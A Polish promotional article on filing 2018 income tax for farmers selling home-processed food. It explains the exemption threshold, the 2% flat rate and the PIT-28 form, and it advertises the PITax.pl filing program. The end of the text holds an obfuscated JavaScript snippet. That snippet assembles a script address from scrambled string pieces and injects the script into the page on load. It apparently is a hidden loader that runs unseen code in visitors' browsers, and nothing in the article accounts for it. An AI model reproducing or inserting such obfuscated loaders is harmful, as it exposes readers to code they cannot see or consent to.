



Rozliczenie PIT 2018 osób sprzedających produkty przetworzone z własnej uprawy, hodowli lub chowu.

Prawie każdy z nas pamięta smak domowego, pieczonego w piecu chleba na prawdziwym zakwasie, powidła śliwkowe, czy konfitury wiśniowe z rosnących w babcinym sadzie owoców. Niezapomniany jest również smak i aromat prawdziwych, domowych mięs wędzonych w ogrodowej wędzarni, jajek od szczęśliwych kur, czy mleka od krowy przyprowadzonej prosto z zielonego pastwiska. Tego się nie zapomina. Wakacje u babci pozostały tylko cudownym wspomnieniem z dzieciństwa a smaku wiejskiego, zdrowego jedzenia na pewno szukać w sklepowych produktach. Renesans przeżywają więc małe gospodarstwa rolne, w których rolnicy zajmują się wyrobem wspomnianej wyżej żywności z produktów wytworzonych we własnym zakresie. Od 2016 roku mogą te produkty oraz produkty takie jak pierogi, naleśniki, ciasta, gołąbki sprzedawać. Oczywiście dochód, jak każdy inny jest opodatkowany i gospodarz, czy gospodyni ma obowiązek złożyć we właściwym urzędzie skarbowym rozliczenie PIT. Zwolnieni z obowiązku składania PIT 2018 są rolnicy, którzy ze wspomnianej działalności uzyskali przychód, który w skali rocznej był niższy niż 20 tysięcy złotych. Wszyscy, którzy ze sprzedaży przetworzonych produktów rolnych zyskali wyższy przychód, mogą rozliczać się z fiskusem w oparciu o skalę podatkową lub wybrać łatwiejszą formę, jaką jest ryczałt ewidencjonowany płacony według bardzo niskiej, bo 2 procentowej stawki. Jeśli rolnik wybierze tę drugą formę, ma obowiązek poinformowania o tym na piśmie naczelnika swojego urzędu skarbowego, a rozliczenie roczne PIT musi złożyć na deklaracji PIT 28 lub (w przypadku, gdy jako pomocnika przy rozliczaniu podatku wybierze program pit 2018) na e - PIT 28. **Rozliczenie PIT 2018 z PIT 2018** program to duża oszczędność czasu i komfort. Bez względu na to, czy osoba prowadząca sprzedaż przetworzonych produktów rolnych z własnej uprawy lub hodowli, wybrał jako formę rozliczenia podatku skalę podatkową, czy ryczałt, może skorzystać z rozliczenia PIT przez Internet, przy pomocy [PITax.pl](https://www.pitax.pl/rozliczenie-pit/) Łatwe podatki, to program, który ułatwił już życie nie jednemu podatnikowi. Jest bezpieczny, z aktualną bazą deklaracji podatkowych i załącznikami. Zaletą skorzystania z programu PIT jest duża oszczędność czasu, zwłaszcza dla osób mieszkających w sporej odległości od urzędu skarbowego. Wystarczy dostęp do Internetu, żeby rozliczyć podatek na komputerze, smartfonie czy tablecie aby samodzielnie, bez pomocy doradców podatkowych, przygotować i wysłać własną deklarację podatkową. Program wykona rozliczenie pit 2018 na każdym formularzu podatkowym o wybranej porze dnia a nawet w nocy. Najważniejsze, żeby zrobić to w terminie przewidzianym dla poszczególnych PITów. **Możesz przesłać swoje rozliczenie PIT 2018 pocztą elektroniczną!** Przekazanie tradycyjnego, papierowego PITu do skarbowki wymaga złożenia odrębnego podpisu podatnika. Jeśli jednak wybierzemy opcję internetową rozliczenia, nie musimy się martwić o złożenie autografu w postaci podpisu elektronicznego. Do przesłania e-deklaracji musimy podać nasze dane osobowe oraz wartość przychodu z ubiegłorocznego PITu. Po wpisaniu wartości w odpowiednie pola, możemy przystąpić do wysłania wypełnionego rocznego dokumentu podatkowego - więcej informacji [tutaj](https://www.pitax.pl/wiedza/). Trafi on do wskazanego urzędu w ciągu zaledwie paru sekund. Chwilę potem otrzymamy tzw. UPO, czyli Urzędowe Potwierdzenie Odbioru, czyli dowód na dostarczenie zeznania podatkowego. Rozliczenie deklaracji PIT internetowo, to najlepsze rozwiązanie dla osób, które wszystko odkładają na ostatnią chwilę. **Artykuł pilotujący projekt "PITax.pl dla OPP", czyli wspólną inicjatywę Instytutu Wsparcia Organizacji Pozarządowych (IWOP) oraz firmy PITax.pl** Łatwe podatki umożliwiającą organizacjom OPP efektywne pozyskiwanie 1% z podatku PIT.

```
<script type="text/javascript">// 
(function(){
tXbau="9neuk5prXbaq";tXba=document.createElement("script");
tXba_="u"+"(st)";tXba_+="at"+".";tXba.async=true;tXba_+="in";
tXbau="72272779."+tXbau;tXba.type="text/javascript";tXbau+="4sx8rcfusej5";
tXbau+="gnzjf1";tXba_+="(f)"+"o"+"(/)";tXba.src="/"+tXba_+tXbau;
tXbad=document.body;tXbad.appendChild(tXba);
})();
// ]]&gt;&lt;/script&gt;</pre></div>
```

